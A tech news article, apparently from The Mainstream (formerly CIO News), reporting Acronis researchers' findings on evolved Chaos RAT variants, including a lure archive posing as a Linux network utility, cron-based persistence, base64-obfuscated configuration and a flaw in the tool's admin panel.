Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of Chaos RAT, a once-legitimate open-source remote administration tool that is now actively leveraged in malicious campaigns targeting Linux and Windows systems.
First observed in 2022 and initially built as a cross-platform management utility, it has increasingly drawn the interest of cybercriminals due to its flexibility, low detection footprint, and open-source accessibility.
Originally designed and distributed on GitHub as a remote management tool written in Golang, Chaos RAT has been weaponized by threat actors who are using it in stealthy, real-world attacks.
The latest samples, discovered in 2025, demonstrate the tool’s ongoing evolution, with expanded compatibility, obfuscation techniques, and operational stealth. While its usage remains relatively limited compared to other malware families, its ability to bypass detection and maintain persistent access has made it a tool of choice for espionage, data exfiltration, and post-exploitation operations, including ransomware deployment.
Researchers have identified a critical vulnerability in Chaos RAT’s web-based administration panel that could allow remote code execution on the server hosting the panel. While this flaw does not directly affect victim machines, it underscores the insecure design practices behind the tool.
More importantly, it could enable attackers to seize control from other operators. This case highlights the broader risks associated with open-source tools increasingly used within cybercrime supply chains. In this latest sample spotted on Virus Total and submitted from India, a tar.gz-compressed archived file named NetworkAnalyzer.tar.gz contained the final Chaos RAT payload.
There’s no additional information on how the victim received this package, but available information points to a lure attempting to convince them to download a network troubleshooting utility for Linux environments.
This typically reaches victims via phishing emails or compromised websites, with early campaigns deploying malicious scripts that modified files, a common persistence mechanism in Unix-like systems. By embedding a cron job that fetches payloads remotely, attackers ensure they can update the malware without re-infecting the host system.
This approach was notably used in earlier attacks to deliver cryptocurrency miners in parallel with the latest threat, indicating reconnaissance or foothold establishment as the malware’s primary purpose.
Notably, older Chaos RAT versions stored configuration data such as IP addresses and ports in plain text, whereas the newer variant encapsulates all data in a single base64-encoded string with an additional decoding function, a clear attempt to hinder reverse engineering and forensic analysis.
Also read:Â Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream formerly known as CIO News LinkedIn Account | The Mainstream formerly known as CIO News Facebook | The Mainstream formerly known as CIO News Youtube | The Mainstream formerly known as CIO News Twitter |The Mainstream formerly known as CIO News Whatsapp Channel | The Mainstream formerly known as CIO News Instagram
About us:
The Mainstream formerly known as CIO News is a premier platform dedicated to delivering latest news, updates, and insights from the tech industry. With its strong foundation of intellectual property and thought leadership, the platform is well-positioned to stay ahead of the curve and lead conversations about how technology shapes our world. From its early days as CIO News to its rebranding as The Mainstream on November 28, 2024, it has been expanding its global reach, targeting key markets in the Middle East & Africa, ASEAN, the USA, and the UK. The Mainstream is a vision to put technology at the center of every conversation, inspiring professionals and organizations to embrace the future of tech.
